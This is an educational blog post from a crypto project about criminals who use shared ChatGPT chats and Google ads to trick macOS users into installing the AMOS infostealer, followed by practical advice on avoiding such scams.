Educational Byte: How ChatGPT Is Used to Steal Your Crypto

digitado ⋅ 22 de April de 2026

Launched in 2022 by OpenAI, ChatGPT has become one of the most used apps worldwide, with over 900 million weekly active users as of early 2026. People from all around the world are using it for anything and everything, from writing emails to coding websites. Of course, cybercriminals are taking note of this, and they’ve already created some ways to misuse it to steal information and cryptocurrencies.

Let’s see what this is about, and how to avoid potential attacks.

Infostealer + AI

The involved malware is a classic “infostealer”: a malicious piece of code designed to collect sensitive data from the infected device. That could be passwords saved in browsers, session cookies, private documents, wallet files (and private keys), or messaging app data. It gathers all quietly and sends it to a remote server —to the hacker, who will steal everything of value.

So, what does ChatGPT have to do with this? The key is the chat-sharing feature. In case you didn’t know, it’s possible to share any conversation with ChatGPT on social media or using a sharing link that you can paste anywhere. As discovered by the cybersecurity firm Kaspersky, some unknown actors abused this feature to distribute malware disguised as a macOS browser installation guide.

Malicious Google ad with ChatGPT shared link. Image by Kaspersky

They bought ad spaces at the top of the Google results, and the links looked legitimate because they actually led to chatgpt.com. The detail is that they created the fake guide by themselves, and then shared it with everyone through these ads. As such, the shared chat contains instructions telling users to copy a line of code into macOS Terminal. That command downloads a malicious script from an external server and executes it, which is how users get infected with the infostealer.

Known as AMOS, short for Atomic macOS Stealer, security analysis shows this malware targets Chrome and Firefox profiles, Telegram Desktop data, and wallet applications like Electrum and Exodus. After harvesting information, it can install a backdoor that relaunches on reboot, giving remote access to the infected machine. Any victim could potentially be robbed of all their saved data and wallets.

How to Stay Safe

Terminal commands can be risky because they provide access to system operations, so no legitimate app should request to use them. That trick has also been used on fake CAPTCHAs and Windows, for the same malicious reasons, and it’s an immediate red flag. Never change your own system with terminal commands unless you’re 100% sure of what you’re doing.

Besides this, apply the basics: keep your systems, apps, and antivirus updated, and your private keys offline. In Obyte, you can use a simple textcoin to keep most of your funds out of immediate reach for hackers.

n Also, avoid clicking sponsored search results for downloads. Anyone can buy those spaces, including cybercriminals and scammers. Instead, navigate directly to official project sites by typing the address manually. Disable automatic password saving in browsers used for crypto activity, and consider a dedicated browser profile only for wallet extensions.

If you happen to come across any suspicious instructions, copy the command or link into a fresh AI chat and request a plain explanation of what it does. Reviewing the code before execution adds a simple but powerful safety layer between curiosity and loss. Never share sensitive information with AI chats, though. It can be leaked and robbed, too.

And remember: a few seconds of doubt can block a chain reaction that ends in an empty wallet. Don’t trust, verify.

Featured Vector Image by Freepik.

Like 0

Liked Liked